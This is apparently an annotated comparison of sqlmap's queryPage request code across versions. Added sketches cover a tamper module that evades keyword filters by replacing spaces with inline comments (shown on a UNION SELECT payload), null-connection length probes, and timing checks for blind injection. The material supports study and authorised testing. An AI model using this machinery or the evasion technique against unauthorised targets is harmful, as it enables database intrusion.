                payload = payload.replace('>', "&gt;").replace('<', "&lt;")
            elif kb.postHint == POST_HINT.JSON:
                if payload.startswith('"') and payload.endswith('"'):
                    payload = json.dumps(payload[1:-1])
                else:
                    payload = json.dumps(payload)[1:-1]
            elif kb.postHint == POST_HINT.JSON_LIKE:
                payload = payload.replace("'", REPLACEMENT_MARKER).replace('"', "'").replace(REPLACEMENT_MARKER, '"')
                if payload.startswith('"') and payload.endswith('"'):
                    payload = json.dumps(payload[1:-1])
                else:
                    payload = json.dumps(payload)[1:-1]
                payload = payload.replace("'", REPLACEMENT_MARKER).replace('"', "'").replace(REPLACEMENT_MARKER, '"')

            value = agent.replacePayload(value, payload)
        else:
            # GET, POST, URI and Cookie payload needs to be thoroughly URL encoded
            if place in (PLACE.GET, PLACE.URI, PLACE.COOKIE) and not conf.skipUrlEncode or place in (PLACE.POST, PLACE.CUSTOM_POST) and kb.postUrlEncode:
                payload = urlencode(payload, '%', False, place != PLACE.URI)  # spaceplus is handled down below
                value = agent.replacePayload(value, payload)
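The tamper loop above calls each loaded function with the payload (this newer version also passes headers) and requires a string back, otherwise it raises SqlmapValueException. For reference, a minimal tamper module in the shape sqlmap loads; the space-to-inline-comment transform is a real sqlmap technique (cf. the bundled space2comment script), but this particular module is a sketch, not sqlmap's own code:

# Sketch of a tamper module as kb.tamperFunctions would invoke it
def tamper(payload, **kwargs):
    """Replace spaces with inline comments to evade naive keyword filters."""
    return payload.replace(" ", "/**/") if payload else payload

assert tamper("1 UNION SELECT NULL") == "1/**/UNION/**/SELECT/**/NULL"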
def queryPage(value=None, place=None, content=False, getRatioValue=False, silent=False, method=None, timeBasedCompare=False, noteResponseTime=True, auxHeaders=None, response=False, raise404=None):
    """
    This method calls a function to get the target url page content
    and returns its page MD5 hash or a boolean value in case of
    string match check ('--string' command line parameter)
    """

    if conf.direct:
        return direct(value, content)

    get = None
    post = None
    cookie = None
    ua = None
    referer = None
    page = None
    pageLength = None
    uri = None

    raise404 = place != PLACE.URI if raise404 is None else raise404

    if not place:
        place = kb.injection.place

    payload = agent.extractPayload(value)
    threadData = getCurrentThreadData()

    if payload:
        if kb.tamperFunctions:
            for function in kb.tamperFunctions:
                payload = function(payload)

            value = agent.replacePayload(value, payload)

        logger.log(9, payload)

        if place == PLACE.COOKIE and conf.cookieUrlencode:
            value = agent.removePayloadDelimiters(value)
            value = urlEncodeCookieValues(value)
        elif place:
            if place in (PLACE.GET, PLACE.POST):
                # payloads in GET and/or POST need to be urlencoded
                # thoroughly without safe chars (especially & and =)
                # addendum: as we support url encoding in tampering
                # functions therefore we need to use % as a safe char
                payload = urlencode(payload, "%", False, True)
                value = agent.replacePayload(value, payload)

            value = agent.removePayloadDelimiters(value)

    if conf.checkPayload:
        checkPayload(value)

    if PLACE.GET in conf.parameters:
        get = urlencode(conf.parameters[PLACE.GET] if place != PLACE.GET or not value else value, limit=True)

    if PLACE.POST in conf.parameters:
        post = urlencode(conf.parameters[PLACE.POST] if place != PLACE.POST or not value else value)

    if PLACE.COOKIE in conf.parameters:
        cookie = conf.parameters[PLACE.COOKIE] if place != PLACE.COOKIE or not value else value

    if PLACE.UA in conf.parameters:
        ua = conf.parameters[PLACE.UA] if place != PLACE.UA or not value else value

    if PLACE.REFERER in conf.parameters:
        referer = conf.parameters[PLACE.REFERER] if place != PLACE.REFERER or not value else value

    if PLACE.URI in conf.parameters:
        uri = conf.url if place != PLACE.URI or not value else value
    else:
        uri = conf.url

    if timeBasedCompare:
        if len(kb.responseTimes) < MIN_TIME_RESPONSES:
            clearConsoleLine()

            warnMsg = "time-based comparison needs larger statistical "
            warnMsg += "model. Making a few dummy requests, please wait.."
            logger.warn(warnMsg)

            while len(kb.responseTimes) < MIN_TIME_RESPONSES:
                Connect.queryPage(content=True)

    if conf.safUrl and conf.saFreq > 0:
        kb.queryCounter += 1
        if kb.queryCounter % conf.saFreq == 0:
            Connect.getPage(url=conf.safUrl, cookie=cookie, direct=True, silent=True, ua=ua, referer=referer)

    start = time.time()

    if kb.nullConnection and not content and not response and not timeBasedCompare:
        if kb.nullConnection == NULLCONNECTION.HEAD:
            method = HTTPMETHOD.HEAD
        elif kb.nullConnection == NULLCONNECTION.RANGE:
            if not auxHeaders:
                auxHeaders = {}

            auxHeaders[HTTPHEADER.RANGE] = "bytes=-1"

        _, headers = Connect.getPage(url=uri, get=get, post=post, cookie=cookie, ua=ua, referer=referer, silent=silent, method=method, auxHeaders=auxHeaders, raise404=raise404)

        if kb.nullConnection == NULLCONNECTION.HEAD and HTTPHEADER.CONTENT_LENGTH in headers:
            pageLength = int(headers[HTTPHEADER.CONTENT_LENGTH])
        elif kb.nullConnection == NULLCONNECTION.RANGE and HTTPHEADER.CONTENT_RANGE in headers:
            pageLength = int(headers[HTTPHEADER.CONTENT_RANGE][headers[HTTPHEADER.CONTENT_RANGE].find('/') + 1:])

    if not pageLength:
        page, headers = Connect.getPage(url=uri, get=get, post=post, cookie=cookie, ua=ua, referer=referer, silent=silent, method=method, auxHeaders=auxHeaders, response=response, raise404=raise404, ignoreTimeout=timeBasedCompare)

    threadData.lastQueryDuration = calculateDeltaSeconds(start)

    if kb.testMode:
        kb.testQueryCount += 1

        if conf.cj:
            conf.cj.clear()

    if timeBasedCompare:
        return wasLastRequestDelayed()
    elif noteResponseTime:
        kb.responseTimes.append(threadData.lastQueryDuration)

    if content or response:
        return page, headers

    page = removeReflectiveValues(page, payload)

    if getRatioValue:
        return comparison(page, getRatioValue=False, pageLength=pageLength), comparison(page, getRatioValue=True, pageLength=pageLength)
    elif pageLength or page:
        return comparison(page, getRatioValue, pageLength)
    else:
        return False
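Both queryPage versions support "null connection" requests that learn the page length without transferring the body: a HEAD request reads Content-Length, while a Range: bytes=-1 request makes the server answer with a Content-Range header whose total size follows the '/'. A minimal sketch of both variants using only the standard library (Python 2 httplib to match the code above; http.client in Python 3; host/path are placeholders):

import httplib

def null_connection_length(host, path):
    # HEAD variant: page length from Content-Length, no body transferred
    conn = httplib.HTTPConnection(host)
    conn.request("HEAD", path)
    resp = conn.getresponse()
    length = resp.getheader("Content-Length")
    if length is not None:
        return int(length)

    # Range variant: ask for the last byte only; the total size is the
    # part of Content-Range after '/' (e.g. "bytes 1022-1022/1023"),
    # mirroring the find('/') + 1 slicing in queryPage()
    conn = httplib.HTTPConnection(host)
    conn.request("GET", path, headers={"Range": "bytes=-1"})
    resp = conn.getresponse()
    content_range = resp.getheader("Content-Range")
    if content_range:
        return int(content_range[content_range.find('/') + 1:])
    return None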
def queryPage(value=None, place=None, content=False, getRatioValue=False, silent=False, method=None, timeBasedCompare=False, noteResponseTime=True, auxHeaders=None, response=False, raise404=None, removeReflection=True):
    """
    This method calls a function to get the target url page content
    and returns its page MD5 hash or a boolean value in case of
    string match check ('--string' command line parameter)
    """

    if conf.direct:
        return direct(value, content)

    get = None
    post = None
    cookie = None
    ua = None
    referer = None
    page = None
    pageLength = None
    uri = None

    if not place:
        place = kb.injection.place or PLACE.GET

    raise404 = place != PLACE.URI if raise404 is None else raise404

    payload = agent.extractPayload(value)
    threadData = getCurrentThreadData()

    if payload:
        if kb.tamperFunctions:
            for function in kb.tamperFunctions:
                payload = function(payload)

            value = agent.replacePayload(value, payload)

        logger.log(9, payload)

        if place == PLACE.COOKIE and conf.cookieUrlencode:
            value = agent.removePayloadDelimiters(value)
            value = urlEncodeCookieValues(value)
        elif place:
            if place in (PLACE.GET, PLACE.POST, PLACE.URI):
                # payloads in GET and/or POST need to be urlencoded
                # thoroughly without safe chars (especially & and =)
                # addendum: as we support url encoding in tampering
                # functions therefore we need to use % as a safe char
                if place != PLACE.URI or ('?' in value and value.find('?') < value.find(payload)):
                    payload = urlencode(payload, "%", False, True)
                    value = agent.replacePayload(value, payload)
            elif place == PLACE.SOAP:
                # payloads in SOAP should have chars > and < replaced
                # with their HTML encoded counterparts
                payload = payload.replace('>', '&gt;').replace('<', '&lt;')
                value = agent.replacePayload(value, payload)

            value = agent.removePayloadDelimiters(value)

    if conf.checkPayload:
        checkPayload(value)

    if PLACE.GET in conf.parameters:
        get = conf.parameters[PLACE.GET] if place != PLACE.GET or not value else value

    if PLACE.POST in conf.parameters:
        post = conf.parameters[PLACE.POST] if place != PLACE.POST or not value else value

    if PLACE.SOAP in conf.parameters:
        post = conf.parameters[PLACE.SOAP] if place != PLACE.SOAP or not value else value

    if PLACE.COOKIE in conf.parameters:
        cookie = conf.parameters[PLACE.COOKIE] if place != PLACE.COOKIE or not value else value

    if PLACE.UA in conf.parameters:
        ua = conf.parameters[PLACE.UA] if place != PLACE.UA or not value else value

    if PLACE.REFERER in conf.parameters:
        referer = conf.parameters[PLACE.REFERER] if place != PLACE.REFERER or not value else value

    if PLACE.URI in conf.parameters:
        uri = conf.url if place != PLACE.URI or not value else value
    else:
        uri = conf.url

    if conf.rParam:
        def _randomizeParameter(paramString, randomParameter):
            retVal = paramString
            match = re.search("%s=(?P<value>[^&;]+)" % randomParameter, paramString)
            if match:
                origValue = match.group("value")
                retVal = re.sub("%s=[^&;]+" % randomParameter, "%s=%s" % (randomParameter, randomizeParameterValue(origValue)), paramString)
            return retVal

        for randomParameter in conf.rParam:
            for item in [PLACE.GET, PLACE.POST, PLACE.COOKIE]:
                if item in conf.parameters:
                    origValue = conf.parameters[item]

                    if item == PLACE.GET and get:
                        get = _randomizeParameter(get, randomParameter)
                    elif item == PLACE.POST and post:
                        post = _randomizeParameter(post, randomParameter)
                    elif item == PLACE.COOKIE and cookie:
                        cookie = _randomizeParameter(cookie, randomParameter)

    get = urlencode(get, limit=True)

    if post and place != PLACE.POST and hasattr(post, UNENCODED_ORIGINAL_VALUE):
        post = getattr(post, UNENCODED_ORIGINAL_VALUE)
    else:
        post = urlencode(post)

    if timeBasedCompare:
        if len(kb.responseTimes) < MIN_TIME_RESPONSES:
            clearConsoleLine()

            warnMsg = "time-based comparison needs larger statistical "
            warnMsg += "model. Making a few dummy requests, please wait.."
            singleTimeWarnMessage(warnMsg)

            while len(kb.responseTimes) < MIN_TIME_RESPONSES:
                Connect.queryPage(content=True)

            deviation = stdev(kb.responseTimes)

            if deviation > WARN_TIME_STDEV:
                kb.adjustTimeDelay = False

                warnMsg = "there is considerable lagging (standard deviation: "
                warnMsg += "%.1f sec%s) " % (deviation, "s" if deviation > 1 else "")
                warnMsg += "in connection response(s). Please use as high "
                warnMsg += "value for --time-sec option as possible (e.g. "
                warnMsg += "%d or more)" % (conf.timeSec * 2)
                logger.critical(warnMsg)

        elif not kb.testMode:
            warnMsg = "it is very important not to stress the network adapter's "
            warnMsg += "bandwidth during usage of time-based queries"
            singleTimeWarnMessage(warnMsg)

    if conf.safUrl and conf.saFreq > 0:
        kb.queryCounter += 1
        if kb.queryCounter % conf.saFreq == 0:
            Connect.getPage(url=conf.safUrl, cookie=cookie, direct=True, silent=True, ua=ua, referer=referer)

    start = time.time()

    if kb.nullConnection and not content and not response and not timeBasedCompare:
        if kb.nullConnection == NULLCONNECTION.HEAD:
            method = HTTPMETHOD.HEAD
        elif kb.nullConnection == NULLCONNECTION.RANGE:
            if not auxHeaders:
                auxHeaders = {}

            auxHeaders[HTTPHEADER.RANGE] = "bytes=-1"

        _, headers, code = Connect.getPage(url=uri, get=get, post=post, cookie=cookie, ua=ua, referer=referer, silent=silent, method=method, auxHeaders=auxHeaders, raise404=raise404)

        if headers:
            if kb.nullConnection == NULLCONNECTION.HEAD and HTTPHEADER.CONTENT_LENGTH in headers:
                pageLength = int(headers[HTTPHEADER.CONTENT_LENGTH])
            elif kb.nullConnection == NULLCONNECTION.RANGE and HTTPHEADER.CONTENT_RANGE in headers:
                pageLength = int(headers[HTTPHEADER.CONTENT_RANGE][headers[HTTPHEADER.CONTENT_RANGE].find('/') + 1:])

    if not pageLength:
        page, headers, code = Connect.getPage(url=uri, get=get, post=post, cookie=cookie, ua=ua, referer=referer, silent=silent, method=method, auxHeaders=auxHeaders, response=response, raise404=raise404, ignoreTimeout=timeBasedCompare)

    threadData.lastQueryDuration = calculateDeltaSeconds(start)

    if kb.testMode:
        kb.testQueryCount += 1

        if conf.cj:
            conf.cj.clear()

    if timeBasedCompare:
        return wasLastRequestDelayed()
    elif noteResponseTime:
        kb.responseTimes.append(threadData.lastQueryDuration)

    if not response and removeReflection:
        page = removeReflectiveValues(page, payload)

    if content or response:
        return page, headers

    if getRatioValue:
        return comparison(page, headers, code, getRatioValue=False, pageLength=pageLength), comparison(page, headers, code, getRatioValue=True, pageLength=pageLength)
    elif pageLength or page:
        return comparison(page, headers, code, getRatioValue, pageLength)
    else:
        return False
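This later queryPage builds a statistical model of normal response times before trusting time-based injection results: it collects MIN_TIME_RESPONSES baseline samples, warns when their standard deviation exceeds WARN_TIME_STDEV, and wasLastRequestDelayed then judges each request against that baseline. A minimal sketch of that decision; the constant value and the mean-plus-k-deviations threshold are illustrative stand-ins for sqlmap's exact rule:

import math

MIN_TIME_RESPONSES = 10   # illustrative; mirrors the constant used above

def stdev(values):
    mean = sum(values) / float(len(values))
    return math.sqrt(sum((v - mean) ** 2 for v in values) / len(values))

def was_request_delayed(response_times, last_duration, k=2.0):
    """Flag 'last_duration' as a deliberate delay when it lies more than
    k standard deviations above the observed baseline mean."""
    if len(response_times) < MIN_TIME_RESPONSES:
        raise ValueError("statistical model needs more samples")
    mean = sum(response_times) / float(len(response_times))
    return last_duration > mean + k * stdev(response_times)

baseline = [0.31, 0.35, 0.29, 0.33, 0.30, 0.36, 0.32, 0.31, 0.34, 0.30]
print(was_request_delayed(baseline, 5.4))  # -> True (timed payload fired)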